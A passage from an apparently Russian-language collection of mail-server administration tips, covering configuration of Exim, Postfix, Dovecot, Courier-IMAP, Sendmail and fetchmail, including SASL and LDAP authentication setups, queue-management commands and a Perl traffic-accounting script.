WITHOUT_IPV6=yes WITH_MYSQL=yes install clean echo 'dovecot_enable="YES"' >> /etc/rc.conf 13. Конфигурируем dovecot mv /usr/local/etc/dovecot.conf /usr/local/etc/dovecot.conf.orig cd /usr/local/etc/ fetch -v https://www.opennet.ru/soft/dovecot.conf fetch -v https://www.opennet.ru/soft/dovecot-sql.conf 14. Запускаем dovecot /usr/local/etc/rc.d/dovecot start 15. Настраиваем почтовый клиент на получение-отправку почты. В качестве логина используем e-mail адрес. Описание таблиц БД exim_db: Таблица accounts - учётные записи пользователей Таблица aliases - алиасы для почтовых адресов Таблица domains - имена почтовых доменов, адреса МХ-ов и их ip-адресов Таблица spam_domains - список "чёрных" доменов Таблица spam_emails - список "чёрных" почтовых адресов Таблица spam_ip_senders - список "чёрных" ip-адресов Таблица white_domains - список "белых" доменов Таблица white_emails - список "белых" почтовых адресов Таблица white_ip_senders - список "белых" ip-адресов

Настройка виртуальных совместных папок в courier-imap (доп. ссылка 1) Автор: Kontrabass [комментарии]

Имеем: виртуальные пользователи в mysql базе, пользователь virtual uid 1000 gid 1000 - владелец маилбоксов, от его имени раскладываем почту. Пользователь spam@example.ru с логином spam подключаемся им по imap, создаем в inbox новую папку MarkHam Создаем файл /usr/local/etc/courier-imap/shared/index name 1000 1000 /mail/ spam/.MarkHam здесь name - название папки под которым ее увидят пользователи в shared_folders 1000 1000 uid gid пользователя virtual - владельца /mail/* /mail - кусочек пути в расшариваемой папке /spam/.MarkHam - еще кусочек пути Далее необходимо настроить права доступа. Имеется пользователь admin@example.ru с логином admin в файл /mail/spam/.MarkHam/courierimapacl добавим строчку user=admin lr так пользователю admin разрешили смотреть и читать.. подробнее man maildiracl далее sharedindexinstall теоретически должна съесть наш файлик и... но заявляет что ... /shared.tmp пусто. cp /usr/local/etc/courier-imap/shared/index /usr/local/etc/courier-imap/shared.tmp sharedindexinstall после этих манипуляций в почтовике обнаруживается shared_folders ТОЛЬКО У ADMIN@EXAMPLE.RU и только на чтение. Остальным права не давали и shared_folders они не увидят вообще. Итак, для появления shared_folders в клиенте необходимо: 1 подправить права у целевой папки 2 файлик index скормить sharedindexinstall ну и наверняка .../rc.d/courier-imap-imapd restart

Настройка Postfix для отправки почты через релэй, требующий авторизации Автор: DREAMER [комментарии]

Пример настройки работы Postfix через релэй с авторизацией наподобие krasmail.ru: /etc/postfix/main.cf relayhost = [krasmail.ru] # auth_krasmail smtp_sasl_auth_enable = yes smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd smtp_sasl_security_options = noanonymous smtp_sasl_type = cyrus smtp_sasl_mechanism_filter = login smtpd_sasl_path = smtpd /etc/postfix/sasl_passwd [krasmail.ru] user:password и потом postmap sasl_passwd postfix reload

Полезные команды exim (доп. ссылка 1) Автор: Хостинг Помощь [комментарии]

Удаление почтового сообщения по ID /usr/sbin/exim -v -Mrm ID Список сообщений в очереди /usr/sbin/exim -bp Число сообщений в очереди /usr/sbin/exim -bpc Удаление "замороженных" сообщений /usr/sbin/exim -bp | awk '$6~"frozen" { print $3 }' | xargs exim -Mrm Принудительная рассылка всей почты в очереди (flush) /usr/sbin/exim -qff -v -C /etc/exim.conf & "Заморозить" почту по email /usr/sbin/exiqgrep -i -f email | xargs exim -Mf Удалить почту по email /usr/sbin/exiqgrep -i -f email | xargs exim -Mrm

Копирование писем в Exim. (доп. ссылка 1) Автор: mr-tacitus [комментарии]

Перейдите в секцию ROUTERS файла конфигурации /usr/local/etc/exim/configure и перед роутером dnslookup добавьте: archive_all: driver = accept transport = tr_archive_all unseen В секции TRANSPORTS добавьте: tr_archive_all: driver = appendfile maildir_format mode = 0660 mode_fail_narrower = false envelope_to_add = true return_path_add = true directory = /var/mail/archive@domain.com Перезагрузите Exim. Теперь вся входящая и исходящая почта будет сохраняться в директории /var/mail/archive@domain.com.

Проверка подлинности получателя в Sendmail + Exchange Server 2003 Автор: Дачкин Евгений [комментарии]

Проверка подлинности получателя сообщений Sendmail + LDAP_ROUTING + AD + Exchange 2000/2003 Исходные данные: AD на базе Win 2003, Exchange Server 2003 расположенный в корпоративной сети. Канал Internet и корпоративную сеть разделяет шлюз в DMZ которого располагается почтовый релей - сервер на базе FreeBSD + Sendmail. Задача: При попытке отправки письма пользователями Internet пользователям Exchange сервера, проверять подлинность адреса получателя, тем самым сократив почтовый трафик и избавиться от ненужных NDR (Non-Delivery Report) сообщений. Действия: Завести в AD служебную учётную запись, от которой будут осуществляться запросы в LDAP каталог. Пример: Пользователь: CN=LDAP_Searcher,OU=Service Accounts,DC=mydomain,DC=com Пароль: password Собрать Sendmail с поддержкой LDAP # cd /usr/ports/mail/sendmail-ldap/ # make # make install Проверить корректность фильтра, соединения с сервером LDAP каталога (контроллером домена) Фильтр: (&(|(objectclass=user)(objectclass=group))(proxyAddresses=smtp:myname@mydomain.com)) Пример запроса: #ldapsearch -L -x -D "CN=LDAP_Searcher,OU=Service Accounts, DC=mydomain,DC=com" -w "password" -h "192.168.0.1" -p 389 -s sub -b "DC=MYDOMAIN,DC=COM" -d "0" "(&(|(objectclass=user) (objectclass=group))(proxyAddresses=smtp: myname@mydomain.com))" Где 192.168.0.1 - IP адрес сервера LDAP каталога (контроллера домена). Результатом работы данной команды мы должны получить полный список всех атрибутов объекта каталога и их значения, соответствующие пользователю или группе, среди smtp адресов которого встречается myname@mydomain.com. Исходя из положительного результата, приступаем к конфигурации Sendmail. Добавляем в файл sendmail.mc следующие 3 строки: define(`confLDAP_DEFAULT_SPEC', `-h "192.168.0.1" -b "DC=MYDOMAIN, DC=COM" -d "CN=LDAP_Searcher,OU=Service Accounts,DC=mydomain, DC=com" -MLDAP_AUTH_SIMPLE -P/etc/mail/ldap_pass')dnl LDAPROUTE_DOMAIN_FILE(`/etc/mail/ldap_route_domains')dnl FEATURE(`ldap_routing', `null', `ldap -1 -T<TMPF> -v mail -k (&(|(objectclass=user)(objectclass=group))(proxyAddresses=smtp:%0))',`bounce')dnl Собираем sendmail.cf /usr/bin/m4 /usr/share/sendmail/cf/m4/cf.m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf Содаём файл /etc/mail/ldap_pass, содержимым которого является пароль служебной учётной записи LDAP_Searcher в открытом виде. В нашем случае: password Создаём файл /etc/mail/ldap_route_domains, содержимым которого является: mydomain.com Запускаем Sendmail.cf Внимательно проверяем результат.

Подсчет exim трафика с разделением на локальный и мировой Автор: DelGod [комментарии]

В файле конфигурации exim пишем: log_file_path = /var/log/exim/exim-%s-%D.log log_selector = +delivery_size +sender_on_delivery +received_recipients В файл /var/db/ukr_net ложим список украинских сетей И собствено скрипт для подсчета трафика с разделением на украинский и мировой: #!/usr/bin/perl -w my ($nmin, $nmax) = (32,0); open UKRNETS, "/var/db/ukr_net"; while (<UKRNETS>) { s/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\/([0-9]+)$//; $UkrIPs{substr(substr(unpack("B32", pack("N", $1)),24).substr(unpack("B32", pack("N", $2)),24).substr(unpack("B32", pack("N", $3)),24).substr(unpack("B32", pack("N", $4)),24),0,$5)}="$1.$2.$3.$4\/$5"; $nmin = $5 if $5 < $nmin; $nmax = $5 if $5 > $nmax; } close UKRNETS; open TRAFF, '/var/log/exim/exim-main-20060122.log'; while (<TRAFF>) { my ($mail_from,$mail_to,$ip,$bytes_in,$bytes_out); if (/^[0-9-]+ [0-9:]+ [A-Za-z0-9]{6}-[A-Za-z0-9]{6}-[A-Za-z0-9]{2} <= ([^\@]+@[A-Za-z0-9-.]+).* H=.*\[([0-9.]+)\].* S=([0-9]+).* for ([^\@]+@[A-Za-z0-9-.]+)$/) { $mail_1=$1; $mail_2=$4; $ip=$2; $bytes_in=$3; $bytes_out=0; } elsif (/^[0-9-]+ [0-9:]+ [A-Za-z0-9]{6}-[A-Za-z0-9]{6}-[A-Za-z0-9]{2} [\=\-\*]\> ([^\@]+@[A-Za-z0-9-.]+).* F=\<([^\@]+@[A-Za-z0-9-.]+)\>.* T=remote_smtp S=([0-9]+).* H=.*\[([0-9.]+)\].*/) { $mail_1=$2; $mail_2=$1; $ip=$4; $bytes_in=0; $bytes_out=$3; } if ((defined($ip)) and ($ip =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/)) { my $ipB=substr(unpack("B32", pack("N", $1)),24)."".substr(unpack("B32", pack("N", $2)),24)."".substr(unpack("B32", pack("N", $3)),24)."".substr(unpack("B32", pack("N", $4)),24); for ($Ne=$nmax; $Ne>=$nmin; $Ne--) { my $ipBin=substr($ipB,0,$Ne); if ($UkrIPs{$ipBin}) { $m_from{$mail_1}{ukr}{in} +=$bytes_in; $m_from{$mail_2}{ukr}{in} +=$bytes_in; $m_from{$mail_1}{ukr}{out}+=$bytes_out; $m_from{$mail_1}{mir}{in} -=$bytes_in; $m_from{$mail_2}{mir}{in} -=$bytes_in; $m_from{$mail_1}{mir}{out}-=$bytes_out; last; } } $m_from{$mail_1}{mir}{in} +=$bytes_in; $m_from{$mail_2}{mir}{in} +=$bytes_in; $m_from{$mail_1}{mir}{out}+=$bytes_out; } } close TRAFF; my $i=0; foreach $mails (keys %m_from) { $i++; print "$i $mails in ukr $m_from{$mails}{ukr}{in} out ukr $m_from{$mails}{ukr}{out} in mir $m_from{$mails}{mir}{in} out mir $m_from{$mails}{mir}{out} "; }

Как забирать почту с одного ящика и раскладывать локальным пользователям (доп. ссылка 1) Автор: universite [комментарии]

Ниже настройки для fetchmail для забора почты с группового почтового ящика и распределения ее по локальным ящикам пользователей. /usr/local/etc/fetchmailrc set daemon 905 defaults set logfile /var/log/fetchmail/fetchmail.log poll mx2.yyyyyyy.od.ua proto pop3 envelope X-Envelope-To localdomains yyyyyyy.od.ua user "halo" pass "qwerty" is root nokeep fetchall flush smtpaddress smtp.xxxxx.odessa.ua fetchdomains yyyyyyy.od.ua is "*" = to "*" norewrite smtphost 127.0.0.1 ############## chmod 710 /usr/local/etc/fetchmailrc # выставляем привелегии для конфига chown fetchmail:wheel /usr/local/etc/fetchmailrc # выставляем владельца и группу конфига echo 'fetchmail_enable="YES"' >> /etc/rc.conf # прописываем для старта в rc.conf /usr/local/etc/rc.d/./fetchmail start # запускаем демона set daemon 905 - проверять ящик каждые 905 сек. mx2.yyyyyyy.od.ua - имя сервера, откуда почту забираешь yyyyyyy.od.ua - твой домен halo - логин на ящике и ниже его пароль smtp.xxxxx.odessa.ua - smtp провайдера или твой релей Сортируется по заголовкам "X-Envelope-To"

Дублирование доставки почты в Postfix c авторизацией в mysql Автор: triz0r [комментарии]

Есть Postfix + авторизация пользователей в mysql. Так вот появилась необходимость почту, приходящую на какой-нить адрес ещё пересылать кому-угодно. Т.е. не форвардить письмо, а именно копию отсылать на нужный адрес. Притом хочется чтобы всё было красиво и понятно. Решение: Postfix ищет virtual_maps в базе mysql virtual_maps=hash:/etc/postfix/virtual_maps.cf virtual_maps.cf содержит запрос который по адресу email выдает alias. Что-то типа такого: user = postfix password = postfix dbname = mail table = alias select_field = goto where_field = address hosts = 127.0.0.1 На goto идет почта, которая предназначается для address. Т.е. на один физический maildir (или другой конечный пункт) собирается почта от разных алиасов. Проблема в том что при такой конфигурации не сделать так чтобы почта для user@domain.com шла и на alias1@domain.com и на alias2@domain2.com После анализа того, как механизм Postfix читает возврат от mysql получаем: Нужно чтобы почта для локального юзера user@domain.com приходила на user@domain.com + на mail@domain2.com и + ещё куда нить :) При этом везде должна лежать копия. Обычно таблица alias содержит вот что: address goto email1 email2 email3 email2 ... email5 email_other Надо сделать так. address goto email other_email1,other_email2,... Т.е. через запятую без пробелом указываем все те адреса куда надо послать копию письма. hash:/mysql примет строку и КОРРЕКТНО подставит её куда надо, а сам Postfix нормально всё выставит в очередь сообщений и отправит. Там же указываем адрес локальной доставки. И всё :) Никаких скиптов, procmail и прочей бурды. Теперь представьте гибкость и легкость с такими вещами как redirect, forwarding, copy + mysql.

Авторизация пользователей в postfix с использованием Cyrus-SASL2 и MySQL Автор: Case Dorsett [комментарии]

Все делалось на FreeBSD 5.4. Ставим cyrus-sasl2: # cd /usr/ports/security/cyrus-sasl2 # make -DWITHOUT_NTLP -DWITHOUT_OTP -DWITH_MYSQL install clean Ставим postfix: # cd /usr/ports/mail/postfix # make install clean Появится менюшка, где надо выбрать с поддержкой чего собирать, нам нужно минимум SASL2, жмем ОК и ждем окончания сборки, после: в файл /usr/local/lib/sasl2/smtpd.conf пишем следующее (ессно заменить информацию о mysql на свою): pwcheck_method: auxprop auxprop_plugin: sql mech_list: sql plain login sql_engine: mysql sql_hostnames: localhost sql_user: postfix sql_passwd: <li><li>* sql_database: mail sql_select: select password from users where login='%u@%r' sql_verbose: yes В /usr/local/etc/postfix/main.cf дописываем: broken_sasl_auth_clients = yes smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = smtpd_sender_restrictions = permit_sasl_authenticated, permit_mynetworks smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject # postfix reload После наполняем mysql и все.. авторизация проходит.. Таких статей конечно много, но при всем их количестве - ушло 2 дня что бы собрать рабочую конфигурацию.. то в одной статье опечатка, то в другой вообще уже устаревшая информация.. здесь я обобщил просто то, что получилось именно у меня в конкретном случае..

Пример боевой конфигурации Postfix Автор: Вотинцев Сергей А. [комментарии]

queue_directory = /var/spool/postfix command_directory = /usr/local/sbin daemon_directory = /usr/local/libexec/postfix sendmail_path = /usr/local/sbin/sendmail newaliases_path = /usr/local/bin/newaliases mailq_path = /usr/local/bin/mailq setgid_group = maildrop manpage_directory = /usr/local/man sample_directory = /usr/local/etc/postfix mail_name = ESMTP mail_owner = postfix myhostname = domain.ru mydomain = domain.ru myorigin = $mydomain virtual_alias_domains = virtual.domain.ru virtual_alias_maps = hash:/usr/local/etc/postfix/virtual inet_interfaces = all mydestination = $mydomain, localhost.$mydomain, localhost mynetworks_style = host mynetworks = hash:/etc/mail/popauth relay_domains = allow_mail_to_commands = alias allow_mail_to_files = alias local_recipient_maps = hash:/usr/local/etc/postfix/users $alias_maps alias_maps = hash:/usr/local/etc/postfix/aliases alias_database = hash:/usr/local/etc/postfix/aliases header_checks = regexp:/usr/local/etc/postfix/header_checks address_verify_map = btree:/usr/local/etc/postfix/verify unknown_local_recipient_reject_code = 550 in_flow_delay = 1s smtpd_banner = $myhostname ESMTP smtpd_helo_required = yes disable_vrfy_command = yes strict_rfc821_envelopes = yes show_user_unknown_table_name = no smtpd_client_event_limit_exceptions = smtpd_delay_reject = no default_process_limit = 50 smtpd_client_connection_count_limit = 15 smtpd_client_connection_rate_limit = 10 smtpd_client_message_rate_limit = 5 anvil_rate_time_unit = 30s smtpd_recipient_limit = 5 smtpd_recipient_overshoot_limit = 5 local_destination_concurrency_limit = 2 default_destination_concurrency_limit = 10 message_size_limit = 5242880 mailbox_size_limit = 26214400 header_size_limit = 51200 smtpd_timeout = 30s smtpd_junk_command_limit = 5 smtpd_error_sleep_time = 10s smtpd_soft_error_limit = 3 smtpd_hard_error_limit = 5 hopcount_limit = 5 smtpd_etrn_restrictions = reject smtpd_reject_unlisted_recipient = yes smtpd_reject_unlisted_sender = yes address_verify_sender = abuse smtpd_client_restrictions = check_client_access hash:/usr/local/etc/postfix/access, reject_rbl_client relays.ordb.org, reject_rbl_client list.dsbl.org, reject_multi_recipient_bounce, reject_unauth_pipelining smtpd_helo_restrictions = reject_unknown_hostname, reject_invalid_hostname, reject_non_fqdn_hostname smtpd_recipient_restrictions = reject_non_fqdn_recipient, reject_unknown_recipient_domain, reject_unlisted_recipient, permit_mynetworks, reject_unauth_destination smtpd_sender_restrictions = reject_non_fqdn_sender, reject_unknown_sender_domain, reject_unlisted_sender, permit_mynetworks, check_sender_access hash:/usr/local/etc/postfix/sender, reject_unverified_sender

Использование pop-before-sendmail.patch для popa3d и Postfix Автор: Вотинцев Сергей А. [комментарии]

Последовательность действий для установки POP Before SMTP на popa3d + Postfix 1: cd /usr/ports/mail/popa3d 2: make 3: cd work/popa3d-popa3d-1.0 4: cp ../../files/pop-before-sendmail.patch pop-before-sendmail.patch 5: patch < pop-before-sendmail.patch правим если нужно params.h 6: make 7: cd ../../ 8: make install && make clean 9: cd /etc/mail/ && touch popauth && postmap popauth Правим main.cf: 10: mynetworks = hash:/etc/mail/popauth 11: postfix reload Правим inetd.conf 12: pop3 stream tcp nowait/10/5/2 root /usr/local/libexec/popa3d popa3d перезапускаем inetd.

Как перезапустить очередь в postfix Автор: Nikolaev D./ [комментарии]

Иногда после изменений в конфигурации необходимо перезапустить очередь что бы сообщения в очереди начали обрабатываться заново: postsuper -r ALL Для очистки очереди: postsuper -d ALL

Почему при обработке почты скриптом в Postfix возникает "mail forwarding loop" [комментарии]

Для предотвращения эффекта игры в "пинг-понг" Postfix добавляет к каждому полученному сообщению заголовок "Delivered-To:" (изменить подобное поведение можно через директиву prepend_delivered_header, но крайне не рекомендуется, из-за возможности появления замкнутых петель). Если письмо обрабатывает скрипт и затем пересылает на другой email (например, менеджер почтовых рассылок), оставив поле "Delivered-To:" в неизменном состоянии, то ложно срабатывает защита. В качестве решения рекомендуется вырезать заголовок "Delivered-To:" на этапе получения письма в скрипте. Например: while (<STDIN>){ if (! /^delivered-to:/i){ .... } }

Как обеспечить работу SMTP сервера при dial-up соединении [комментарии]

- Диалап с фиксированным IP; - MTA провайдера должен быть MX'ом для domain.com (с прописанным почтовым рутингом и "hold" спулом); - После выхода в сеть, посылаем команду "ETRN domain.com", которая приведет к инициированию процесса отправки сообщений из спула для domain.com: echo -e "HELO dial.domain.com\nETRN domain.com\nQUIT\n"| nc relay.domain.com 25

Как удалить письмо из очереди Postfix [комментарии]

postsuper -d <id> deferred (-d ALL - удалить все сообщения из очереди) Для удаления группы писем от определенного адресата, можно использовать: mailq|grep 'test@test.ru'|awk '{print $1}'|xargs -J{} -n1 postsuper -d {} deferred

Как в postfix осуществить преобразования UUCP формата email адреса или внести изменения в адрес. [комментарии]

man 5 canonical (см. canonical_map, recipient_canonical_maps, sender_canonical_maps) main.cf: canonical_maps = regexp:/etc/postfix/canonical_regexp canonical_regexp: /^.*!(.*)!(.*)$/ $2@$1 /^([^!]+)!([^@]+)@.*$/ $2@$1 Преобразуем из вида uutest6!uutest6.uucp.test.ru!user318 в вид user318@uutest.uucp.test.ru

Как организовать в sendmail пересылку всей почты (или для выбранных доменов) только через определенный релей. [комментарии]

в sendmail.cf: DSesmtp:[relay.somehost.ru] или для m4 скриптов: define(`SMART_HOST',`relay.somehost.ru')dnl или для игнорирования MX значения (далее в квадратных скобках): define(`SMART_HOST',`[relay.somehost.ru]')dnl Для описания пути транспортировки почты (почтового роутинга) для определенных доменов: FEATURE(`mailertable', `hash /etc/mail/mailertable')dnl /etc/mail/mailertable domain1 esmtp:relay1.somehost.ru domain2 smtp:[relay2.somehost.ru]

Как в postfix настроить маршрутизацию почты в обход значения MX [комментарии]

Для отправки почты для test.ru только через relay2.test.ru в обход MX: main.cf: transport_maps = hash:/usr/local/etc/postfix/transport transport: test.ru :[relay2.test.ru] Для того чтобы всю почты пересылать через релэй, нужно использовать в main.cf опцию relayhost

Как в postfix и sendmail перенаправить почту для несуществующих пользователей на определенный email ? [комментарии]

Postfix: luser_relay = vasia@pupkin.org Или, для виртуального домена в virtual, перенаправим всю почту для домена test.ru на vasia@pupkin.org, в viruals : test.ru test.ru @test.ru vasia@pupkin.org Sendmail, используя m4: define(`LUSER_RELAY',`mail.somehost.ru') # перенаправление на почтовый сервер define(`LUSER_RELAY',`local:pupkin') # перенаправление локальному пользователю.

Безопасность и установка ограничений

Вариант конфигурации exim в непривилегированном режиме Автор: Pavel Samsonov [обсудить]

Заметка написана с целью поделиться опытом о использовании почтового сервера exim в непривилегированном режиме. Мы используем Exim версии 4.69, операционную систему: Slackware Linux 13.0. В главе 51 "Обсуждение безопасности" спецификации Exim MTA обсуждаются варианты запуска exim в непривилегированном режиме. Вариант, который использую я, чуть отличается. Начнём с рассмотрения конструкции и разрешений пользовательского почтового ящика или каталога. Пользовательский почтовый ящик формата Mbox. Владелец почтового ящика - пользователь, группа - mail. Разрешения на почтовый ящик rw-rw----. Таким образом доступ на запись/чтение в почтовый ящик имеют владелец и группа mail. Группа mail будет использоваться для доставки почты в почтовые ящики. Драйвер append_file у Exim не умеет режим доступа к файлу Mbox rw--w--w-. Почтовый каталог формата Maildir. Владелец почтового каталога - пользователь, группа - mail. Доставленные в почтовый каталог файлы писем будут иметь разрешения mail:mail rw-r--r--. Доставленными файлами писем пользователь не владеет - владельцем остаётся пользователь доставки, но имеет доступ на чтение и перемещение файлов писем. На подкатлоги new и tmp нужно выставить разрешение на запись для группы mail, для подкаталога cur это необязательно. Теперь рассмотрим конструкцию очереди Exim: Я выбрал разрешения на все подкаталоги очереди одинаковые: root:mail rw-rw----. Exim создаёт файлы и каталоги в своей очереди с разрешениями rw-rw---- и rwxrwx--- соответственно, это настраивается в Makefile при сборке exim. Запускать exim можно от пользователя root с изменением привилегий процессов exim на mail:mail установкой в конфигурационном файле опций exim_user = mail, exim_group = mail. Можно если требуется запустить exim от пользователя mail, для этого нужно обеспечить возможность открытия привелегированного сетевого порта. В Linux это можно обеспечить установкой возможности (capabilitie) cap_net_bind_service на исполняемый файл exim. Дополнительно я устанавливаю опцию deliver_drop_privileges в конфигурационном файле. Исполняемому файлу exim назначены группа и владелец mail и root соответственно, разрешения rwxrwxr-x, установлен setgid бит. Вариант маршрутизатора и транспорта для доставки в mbox: local_delivery_router: driver = accept check_local_user domains = +local_domains transport = local_delivery user = $caller_uid group = mail local_delivery_transport: driver = appendfile file = /var/mail/$local_part delivery_date_add envelope_to_add return_path_add check_owner = false check_group = false file_must_exist = true user = $caller_uid group = mail mode = 660 Вариант маршрутизатора и транспорта для доставки в maildir: maildir_router: driver = accept check_local_user domains = +local_domains transport = maildir_transport user = $caller_uid group = mail maildir_transport: driver = appendfile maildir_format = true directory = $home/Mail/ delivery_date_add envelope_to_add return_path_add user = $caller_uid group = mail mode = 644 check_owner = false check_group = false create_directory = false Переменная $caller_uid имеет значение uid пользователя, запустившего exim для доставки сообщения. Для писем, принятых по smtp это пользователь exim_user = mail. Для писем, доставляемых обработчиком очереди это пользователь exim_user = mail. При отправке пользователями писем с консоли например утилитой Heirloom mailx, пользователи получают право использовать привилегии группы mail при исполнении файла exim с помощью установленных setgid бита и группы mail на исполняемый файл exim. При этом отправляемое письмо может помещаться в очередь exim или немедленно доставляться локально. Владелец и группа файла письма в очереди и, возможно в почтовом каталоге назначения - $caller_uid:mail. Также создаётся файл журнала письма с владельцем и группой $caller_uid:mail и разрешениями rw-rw----. В процессе доставки письма exim пытается менять владельца файла журнала письма предположительно на exim_user = mail. В рассматриваемой конфигурации для писем, отправляемых пользователями из консоли, он этого сделать не может и это вызывает ошибку доставки. Смену владельца файла журнала письма приходится отключить изменением исходного кода exim. Другого способа я не нашёл. Владельцем файла журнала письма в этом случае останется пользователь-отправитель. Возможно имеет смысл помещать все отправляемые письма в очередь. Для этого можно установить в конфигурационном файле опцию queue_only. Возможно имеет смысл ограничить возможность отправки писем по smtp только пользователями группы mail. Это вызвано сложностью контроля e-mail адреса отправителя с сетевого многопользовательского хоста. В Linux это можно сделать на уровне сетевого фильтра по gid mail.

Подключение виртуальной базы пользователей к Dovecot с CRAM-MD5 аутентификацией (доп. ссылка 1) [комментарии]

Для того чтобы не хранить базу виртуальных пользователей с открытыми паролями можно использовать в Dovecot механизм аутентификации CRAM-MD5. Для включения CRAM-MD5 аутентификации в /etc/dovecot.conf необходимо привести конфигурацию к виду: default_mail_env = maildir:/var/spool/vhosts/%d/%n auth_mechanisms = plain DIGEST-MD5 CRAM-MD5 auth_verbose = yes auth default { mechanisms = plain cram-md5 passdb passwd-file { args = /etc/dovecot/passdb } userdb static { args = uid=virtual gid=virtual /etc/dovecot/userdb } В директории /etc/dovecot создаем два файла: passdb с паролями и userdb со списком пользователей и расположением их виртуальных аккаунтов. Пример содержимого userdb: tom@example.com::510:510::/var/spool/vhosts/example.com/:/bin/false:: Пример passdb: tom@example.com:{HMAC-MD5}e02d374fde0dc75a17a557039a3a5338c7743304777dccd376f332bee68d2cf6 Для формирования HMAC-MD5 хэша на основе открытого пользовательского пароля необходимо использовать утилиту dovecotpw: # dovecotpw Enter new password: Retype new password: {HMAC-MD5}e02d374fde0dc75a17a557039a3a5338c7743304777dccd376f332bee68d2cf6

Создание ограничений входящей и исходящей почты в Postfix для определенных пользователей (доп. ссылка 1) Автор: Резников Алексей [комментарии]

Ситуация:есть Postfix выставленный в Интернет,который допустим выступает шлюзом для Exchange в LAN. Задача: разрешить отправку почты в Интернет и обратно только определенным пользователям. Выход: используем классы разрешений, Postfix restriction classes. Создаем два класса users_out для исходящих писем,users_in соответственно для входящих. smtpd_restriction_classes = users_out, users_in В классах будут проверятся пользователи которым разрешено отправлять и получать почту, именно этим и занимаются правила check_*_access users_in = check_recipient_access hash:/etc/postfix/users, reject users_out = check_sender_access hash:/etc/postfix/users, reject В smtpd_*_restrictions указываем проверку на наш почтовый домен domain.ru к которому будет применяться созданные классы. smtpd_sender_restrictions = check_sender_access hash:/etc/postfix/senders smtpd_recipient_restrictions = permit_mynetworks, check_recipient_access hash:/etc/postfix/destinations, reject_unauth_destination Файл destinations с нашим доменом и указанием классов которые будут применятся к ним у domain.ru users_in Содержимое файла senders domain.ru users_out Файл users со списком пользователей которым разрешено отправлять и получать почту test@domain.ru OK boss@domain.ru OK billy@domain.ru OK Итог: Имеем конфигурацию с помощью которой можем разрешать пересылку определенным пользователям на определенные наши домены.

Настройка SASL аутентификации для Postfix Автор: Астафьев Григорий [комментарии]

Статья о том как сделать sasl на postfix'е и убедиться в его работоспособности. Задача: Установить sasl и postfix и сделать авторизацию вида: 1) отправлять письма могут только пользователи системы (/etc/passwd). 2) все остальные не пропускать. Система: FreeBSD 7.0 Установка: 1) /usr/ports/secutiry/cyrus-sasl2 [+] AUTHDAEMOND [+] LOGIN [+] PLAIN make install clean (если программы уже были установлены то повторно вызвать меню опций при установке можно командой make config) 2) /usr/ports/security/cyrus-sasl2-saslauthd make install clean 3) создаем и редактируем /usr/local/lib/sasl2/smtpd.conf: pwcheck_method: saslauthd mech_list: plain login далее добавляем в /etc/rc.conf: saslauthd_enable="YES" saslauthd_flags="-a pam" 4) Теперь постифкс /usr/ports/mail/postfix [+]SASL2 make install clean при установке на все вопросы ответить утвердительно "y" 5) теперь мини-рабочий конфиг постфикса: /usr/local/etc/postfix/main.cf queue_directory = /var/spool/postfix command_directory = /usr/local/sbin daemon_directory = /usr/local/libexec/postfix mail_owner = postfix myhostname = host.domain.ru mydomain = domain.ru mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain smtpd_sasl_auth_enable = yes smtpd_security_options = noanonymous smtpd_client_restrictions = permit_sasl_authenticated, reject_plaintext_session smtpd_sender_restrictions = permit_sasl_authenticated, reject_plaintext_session (!!! Внимание, господа, эта статья требует чтобы в конфиге postfix не было упоминаний mynetworks) 6) Теперь просто в консоли из под рута newaliases эта команда создаст файл /etc/aliases.db необходимый для постфикса 7) Для тестирования желательно иметь php на машинке потому как sasl механизм login и plain используют технологию шифрования base64 и для обработки "руками" логина и пароля нужно будет написать скриптик: <?php print base64_encode("логин"); print "\n"; print base64_encode("пароль"); print "\n"; ?> P.S. (Кому интересно plain это base64_encode("логин\0логин\0пароль");) тоже самое на Perl: perl -e 'use MIME::Base64; print encode_base64("логин") . "\n" .encode_base64("пароль"). "\n"' 8) Перезагружаем postfix Тестирование SASL. 1) тестирование "руками": telnet айпиадрес 25 оно оветит: 220 host.domain.ru ESMTP Postfix говорим ему: ehlo host (где host -имя машины) оно ответит: 220 host.domain.ru ESMTP Postfix 250-host.domain.ru 250-PIPELINING 250-SIZE 10240000 250-VRFY 250-ETRN 250-AUTH LOGIN PLAIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN если есть строка 250-AUTH LOGIN PLAIN - то значит есть вероятность успеха. теперь заходим без авторизации и смотрим как наше сообщение не проходит: mail from: user@domain.ru оно: 250 2.1.0 Ok мы: rcpt to: user2@domain.ru оно: 554 5.7.1 <user2@domain.ru>: Relay access denied - значит все отлично нас не пустили просто так. напечатайте quit и теперь идем с регистрацией: telnet айпиадрес 25 220 host.domain.ru ESMTP Postfix ehlo host 250-host.domain.ru 250-PIPELINING 250-SIZE 10240000 250-VRFY 250-ETRN 250-AUTH LOGIN PLAIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN теперь вводим: auth login оно скажет нам сообщение вида: 334 VXNlcm5hbWU6 теперь запускаем, предварительно заполнив, тот скриптик который был указан выше и вводим наш логин зашифрованный base64 в ответ на последнее сообщение. у меня это: cGVuc2U= на что сервер ответил 334 UGFzc3dvcmQ6 теперь пароль в том же виде: cnZpZGlh на что оно нам ответит если все было правильно: 235 2.0.0 Authentication successful вот оно - авторизация пройдена. теперь соответственно mail from: rcpt to: data hello world . quit все. письмо отправлено.

popa3d + TLS/SSL (stunnel) на FreeBSD 5.4 Автор: Вотинцев Сергей А. [комментарии]

